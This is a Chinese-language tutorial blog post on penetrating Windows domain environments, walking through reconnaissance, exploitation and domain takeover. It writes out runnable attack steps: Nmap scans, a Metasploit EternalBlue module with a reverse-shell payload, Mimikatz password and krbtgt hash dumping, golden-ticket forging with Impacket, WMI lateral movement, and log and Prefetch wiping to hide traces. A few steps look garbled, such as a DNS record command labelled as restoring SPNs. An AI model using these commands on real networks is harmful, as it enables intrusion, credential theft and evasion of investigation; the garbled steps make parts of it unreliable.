1. 内网渗透实战:从零开始的域环境突破指南
刚接触内网渗透的新手常会遇到这样的困惑:看了大量教程却依然无法独立完成一次完整的域渗透。三年前我接手某企业安全评估项目时,也曾对着域控制器束手无策。经过数十次实战演练,我总结出这套适合自学的系统性方法论,将带你用攻击者视角拆解域渗透全流程。
典型的企业域环境就像一座中世纪城堡:外围防火墙是护城河,域控制器是中央要塞,而域成员服务器则是散布各处的哨塔。渗透测试者需要像攻城部队那样,先突破外围防线,再通过横向移动逐步接近核心目标。下面这个实战案例基于Windows Server 2016域环境搭建的测试平台,所有技术细节均已脱敏处理。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 环境侦察与初始突破
2.1 网络拓扑测绘技巧
使用Nmap进行扫描时,建议采用分阶段策略:
bash复制# 第一阶段快速扫描存活主机
nmap -sn 192.168.1.0/24 -oN live_hosts.txt
# 第二阶段针对开放端口深度识别
nmap -sV -O -p- -iL live_hosts.txt -oA full_scan
关键技巧:在域环境中,DNS服务器往往就是域控制器,优先扫描53端口可快速定位目标。我曾通过这个方法在15分钟内锁定某次红队演练的核心目标。
2.2 漏洞利用的精准打击
根据扫描结果选择攻击面:
- 发现SMB服务(445端口):尝试永恒之蓝(MS17-010)
- 发现RDP服务(3389端口):爆破或CVE-2019-0708
- Web服务(80/443端口):常规Web渗透测试流程
python复制# MS17-010利用示例(需配合Metasploit框架)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
3. 权限提升与横向移动
3.1 本地提权三板斧
-
系统信息收集:
cmd复制systeminfo | findstr /B /C:"OS Name" /C:"OS Version" whoami /priv -
漏洞利用选择:
- Windows 7/Server 2008:优先尝试KiTrap0D(CVE-2010-0232)
- Windows 10/Server 2016:测试PrintNightmare(CVE-2021-34527)
-
密码哈希抓取:
powershell复制Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
3.2 横向移动的隐蔽通道
通过WMI执行远程命令是最隐蔽的方式之一:
powershell复制$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -ComputerName DC01 -Credential $cred
血泪教训:某次演练中因频繁使用psexec触发告警,后来改用WMI+定时任务组合,成功率提升40%。
4. 域控攻防实战
4.1 黄金票据制作全流程
-
获取krbtgt哈希:
powershell复制Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"' -
生成票据:
bash复制
ticketer.py -nthash a9b30e5b0dc865eadcea9411e4ade72d -domain-sid S-1-5-21-4177062603-1451951316-1878157589 -domain lab.com administrator -
注入使用:
bash复制export KRB5CCNAME=/tmp/administrator.ccache psexec.py -k -no-pass dc01.lab.com
4.2 防御规避技巧
- 时间戳随机化:在生成票据时添加-random参数
- 父进程欺骗:通过Process Hollowing启动恶意进程
- 日志清理:使用wevtutil清除特定事件ID
5. 痕迹清理与报告撰写
5.1 反取证操作清单
-
清除Prefetch文件:
cmd复制del C:\Windows\Prefetch\* /f /q -
清理日志:
powershell复制
wevtutil cl Security wevtutil cl System -
恢复SPN:
powershell复制Set-DnsServerResourceRecord -ZoneName lab.com -Name DC01 -RRType "A" -IPv4Address 192.168.1.100
5.2 渗透报告核心要素
-
风险等级矩阵:
漏洞类型 CVSS评分 影响范围 修复建议 MS17-010 9.8 全网 立即打补丁 -
攻击路径图:
code复制
外网Web服务器 → 数据库服务器 → 文件服务器 → 域控制器
6. 自学路线与资源推荐
6.1 分阶段学习计划
-
基础阶段(1-3个月):
- 《Metasploit渗透测试指南》
- Hack The Box初级靶机
-
进阶阶段(3-6个月):
- Active Directory安全课程(Pentester Academy)
- CRTP认证培训
-
实战阶段(6个月+):
- 参与漏洞众测项目
- 搭建域环境实验室
6.2 必备工具清单
-
信息收集:
- BloodHound
- PowerView
-
漏洞利用:
- Cobalt Strike
- Empire
-
后渗透:
- Mimikatz
- Impacket套件
在最近一次企业红队行动中,通过组合使用BloodHound和定制化的Mimikatz脚本,我们仅用6小时就完成了从外网到域控的完整突破。记住,域渗透不是工具堆砌,而是对AD架构理解的深度考验。建议每完成一次演练后,用Visio绘制完整的攻击路径图,这比任何笔记都更有价值。
